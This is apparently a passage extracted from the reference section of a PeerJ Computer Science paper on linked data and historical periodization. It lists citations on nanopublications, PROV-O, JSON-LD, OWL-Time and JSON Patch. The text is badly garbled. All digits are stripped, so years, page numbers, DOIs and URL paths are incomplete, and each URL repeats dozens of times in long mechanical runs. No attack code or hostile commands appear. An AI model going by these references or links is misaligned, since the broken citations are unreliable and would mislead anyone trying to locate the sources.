.marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://www.w .org/tr/ /rec-turtle- / http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md http://dx.doi.org/ . /jd- - - http://dx.doi.org/ . /isu- - http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://dx.doi.org/ . /s ed v y wbe http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://www.w .org/tr/ /wd-owl-time- / http://dx.doi.org/ . /peerj-cs. isaksen l, simon r, barker et, de soto cañamares p. . pelagios and the emerging graph of ancient world data. in: proceedings of the acm conference on web science—websci ’ . new york: acm press, – . kauppinen t, mantegari g, paakkarinen p, kuittinen h, hyvönen e, bandini s. . determining relevance of imprecise temporal intervals for cultural heritage information retrieval. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . kuhn t. . science bots: a model for the future of scientific computation? in: www companion proceedings. new york: acm. kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: the semantic web: semantics and big data. vol. . heidelberg: springer, – . mcguinness d, lebo t, sahoo s. . prov-o: the prov ontology. w c recommendation, w c. available at http://www.w .org/tr/ /rec-prov-o- /. mink lo. . the autonomy of historical understanding. history and theory ( ): – doi . / . mons b, van haagen h, chichester c, hoen p-bt, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . mons b, velterop j. . nano-publication in the e-science era. in: clark t, luciano js, marshall ms, prud’hommeaux e, stephens s, eds. proceedings of the workshop on semantic web applications in scientific discourse (swasd ), ceur workshop proceedings. washington, d.c. available at http://ceur-ws.org/vol- /mons.pdf. nelson th. . xanalogical structure, needed now more than ever: parallel documents, deep links to content, deep versioning, and deep re-use. acm computing surveys ( es): –es doi . / . . nottingham m, bryan p. . java script object notation (json) patch. in: ietf proposed standard, internet engineering task force (ietf). available at https://tools.ietf.org/html/rfc . rabinowitz a. . it’s about time: historical periodization and linked ancient world data. isaw papers : . available at http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/. shaw r, rabinowitz a, golden p, kansa e. . a sharing-oriented design strategy for networked knowledge organization systems. international journal on digital libraries epub ahead of print aug doi . /s - - - . sporny m, kellogg g, lanthaler m. . json-ld . . w c recommendation, w c. available at http://www.w .org/tr/ /rec-json-ld- /. starr j, willett p, federer l, horning c, bergstrom m. . a collaborative framework for data management services: the experience of the university of california. journal of escience librarianship ( ): – doi . /jeslib. . . golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.ijhcs. . . http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://www.w .org/tr/ /rec-prov-o- / http://dx.doi.org/ . / http://dx.doi.org/ . /ng - http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://ceur-ws.org/vol- /mons.pdf http://dx.doi.org/ . / . https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc https://tools.ietf.org/html/rfc http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ http://dlib.nyu.edu/awdl/isaw/isaw-papers/ /rabinowitz/ 